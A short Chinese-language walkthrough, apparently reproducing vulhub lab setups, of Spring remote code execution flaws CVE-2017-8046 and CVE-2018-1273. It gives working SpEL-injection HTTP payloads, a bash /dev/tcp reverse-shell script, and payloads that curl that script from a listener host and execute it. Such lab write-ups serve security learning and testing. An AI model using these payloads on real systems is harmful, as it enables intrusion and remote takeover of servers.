CVE-2017-8046
访问网站/customers/1 ,进入如下界面
抓包
PATCH /customers/1 HTTP/1.1
Host: 192.168.88.141:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
查看是否创建成功
CVE-2018-1273
访问/users填写信息,抓包,发送到重放器
运行结果
进入容器查看成功写入
反弹shell
bash.sh文件内容为:
// 注意修改IP和端口
bash -i >& /dev/tcp/目标IP/2222 0>&1
将bash.sh上传到/root目录下,上述环境中已经提到如何操作,这里就不再赘述了,首先使用curl命令指定路径将bash.sh下载到目标主机/tmp/目录下:
// 下载文件
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl -o /tmp/bash.sh http://目标IP:9999/bash.sh")]=&password=&repeatedPassword=
在这里插入图片描述
在监听口可以知道文件已下载,开始执行命令:
// 执行.sh文件
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash /tmp/bash.sh")]=&password=&repeatedPassword=